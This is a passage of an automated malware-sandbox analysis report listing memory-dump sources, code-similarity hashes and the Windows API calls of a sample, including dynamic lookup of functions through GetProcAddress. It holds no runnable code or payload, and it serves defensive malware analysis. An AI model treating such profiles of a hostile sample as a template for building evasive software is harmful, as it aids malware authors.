                          • Opcode ID: 39d5fc1ceb74d448a17fd09dff00acef1eaef3a5d9f0ac799ed9ce2879e3bc92
                          • Instruction ID: c5cc0cef52526c8ff5bdb837fa1b077d7549666eb31a992399ee119e7281fa88
                          • Opcode Fuzzy Hash: 39d5fc1ceb74d448a17fd09dff00acef1eaef3a5d9f0ac799ed9ce2879e3bc92
                          • Instruction Fuzzy Hash: 0501807564031DFFDB21DF94EC85AAFBBAAFB42714F00512AF901A6240E7708685CA51
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: strrchr$lstrcmpilstrcpylstrlen
                          • String ID:
                          • API String ID: 3636361484-0
                          • Opcode ID: 4a1fc821c9381231aacb315e10e4f632a0ebff5d763ca36d75157efaffc17c1b
                          • Instruction ID: 24ffba3656764ed434620b059b1ad3349077e66af580b6cbed3aa3fd051d91dd
                          • Opcode Fuzzy Hash: 4a1fc821c9381231aacb315e10e4f632a0ebff5d763ca36d75157efaffc17c1b
                          • Instruction Fuzzy Hash: CC014E7E8042296FDB205720DC09BD637DEDB02350F401065DB41D3180DA709AC48B90
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
                          • srand.MSVCRT ref: 00641878
                          • rand.MSVCRT ref: 00641880
                          • srand.MSVCRT ref: 00641890
                          • rand.MSVCRT ref: 00641894
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: Timerandsrand$FileSystem
                          • String ID:
                          • API String ID: 4106363736-0
                          • Opcode ID: 70207a32605d8c1c184efc98e5c769507a3168cdf8bd5b12048932527ea536da
                          • Instruction ID: 86f73d488de31a08bde0f37f98b9a1c50c93c1fde300f6f68c786e614d116c13
                          • Opcode Fuzzy Hash: 70207a32605d8c1c184efc98e5c769507a3168cdf8bd5b12048932527ea536da
                          • Instruction Fuzzy Hash: D5E0D87BA00228BBD700A7F9EC4689EBBADDE85561B100627F600D3350E5B0FD448AB8
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0064603C
                          • GetProcAddress.KERNEL32(00000000,00646064), ref: 0064604F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: kernel32.dll
                          • API String ID: 1646373207-1793498882
                          • Opcode ID: 5b881b6cdfebee38944368355df32a8dd93b718a5c64bfbb85afb6142596e822
                          • Instruction ID: 0f0b45d0814a35d56d3b0cfeeed8082114235aaa6a6532c118ca94679e66a917
                          • Opcode Fuzzy Hash: 5b881b6cdfebee38944368355df32a8dd93b718a5c64bfbb85afb6142596e822
                          • Instruction Fuzzy Hash: 62F0F0B11402899FEF70CEA4CC44BDE3BE5EB16B00F50442AFA09CB281CB7486458B25